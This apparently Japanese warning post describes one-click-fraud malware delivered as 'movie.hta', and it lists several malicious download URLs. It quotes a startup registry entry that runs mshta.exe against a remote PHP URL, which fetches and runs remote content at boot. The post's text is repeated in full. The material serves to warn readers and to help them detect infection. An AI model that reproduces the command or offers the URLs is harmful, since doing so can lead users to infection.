ダウンロードファイル「movie.hta」
C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [system_boot_cec02acc8fd4fc4ce7d136b83283dfac] C:\Windows\system32\mshta http://bc.ars.0manko.jp/reg2.php?cid=cec02acc8fd4fc4ce7d136b83283dfac
「mshta.exe」が実行。
スタートアップの記述
他にもありますw
警告: これらのURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。
http://gold03.ars.0manko.jp/
http://support.ars.0manko.jp/
http://maroon71.ars.0manko.jp/
http://99.ars.0manko.jp
http://sliver37.ars.0manko.jp/
http://biue25.ars.0manko.jp/
それぞれスタートアップレジストリの記述が異なって
いるかも知れません。
C:\Windows\system32\mshta.exe
O4 - HKCU\..\Run: [system_boot_cec02acc8fd4fc4ce7d136b83283dfac] C:\Windows\system32\mshta http://bc.ars.0manko.jp/reg2.php?cid=cec02acc8fd4fc4ce7d136b83283dfac
「mshta.exe」が実行。
スタートアップの記述
他にもありますw
警告: これらのURLにアクセスし動画ファイルをダウンロードするとワンクリウェア( malicious software )すなわち悪意あるソフトウェアに感染するおそれがあります。
http://gold03.ars.0manko.jp/
http://support.ars.0manko.jp/
http://maroon71.ars.0manko.jp/
http://99.ars.0manko.jp
http://sliver37.ars.0manko.jp/
http://biue25.ars.0manko.jp/
それぞれスタートアップレジストリの記述が異なって
いるかも知れません。
